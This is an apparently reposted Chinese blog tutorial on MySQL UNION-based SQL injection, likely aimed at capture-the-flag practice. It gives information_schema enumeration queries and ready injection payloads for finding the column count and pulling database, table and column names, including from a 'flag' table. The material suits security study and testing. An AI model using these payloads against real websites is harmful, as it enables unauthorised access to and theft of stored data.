美文网首页
Mysql注入-union联合查询注入

Mysql注入-union联合查询注入

作者: nohands_noob | 来源:发表于2019-11-05 21:06 被阅读0次

    mysql中数据库information_schema使得注入方便了许多

    行为 语句
    查库 select schema_name from information_schema.schemata
    查表 select table_name from information_schema.tables where table_schema=库名
    查列 select column_name from information_schema.columns where table_name=表名

    union联合查询
    union注入成功前提:页面有回显,联合查询的列数与原查询的列数一致
    使用 and 1=2是使原来的查询结果失败,一下用 -1 表示
    确定列数:-1 union select 1,2,3,4,5 (如果查询的有5列,页面回显正常,测试列数时从1慢慢添加即可)
    当回显正常时,页面显示数据的地方,会被标记成1,2,3,4,5,这样我们就知道每列的数据显示在什么位置了

    不使用上述方法测试列数也可以直接用order by来确认列数
    如:order by 5(只有5列的话累加到6会出错观察页面数据的变化也可以知道每列的数据显示在什么位置)

    开始获取数据:

    行为 语句
    查数据库 -1 union select 1,database(),3,4,5 ---(库名显示在第二个列表)
    查询表名 -1 union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database() ---(表名全部写在第二列)
    查询列名 -1 union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name='flag' ---(查询flag表的所有列显示在第二列)

    相关文章

      网友评论

          本文标题:Mysql注入-union联合查询注入

          本文链接:https://www.haomeiwen.com/subject/kvgebctx.html

          延伸阅读

          深度阅读

          • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

          栏目导航

          热点阅读

          关于我们|服务条款|联系我们|Mysql注入-union联合查询注入|投稿指南|网站地图|RSS订阅|排版工具|手机版

          提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

          Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

          备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

          本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

          所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!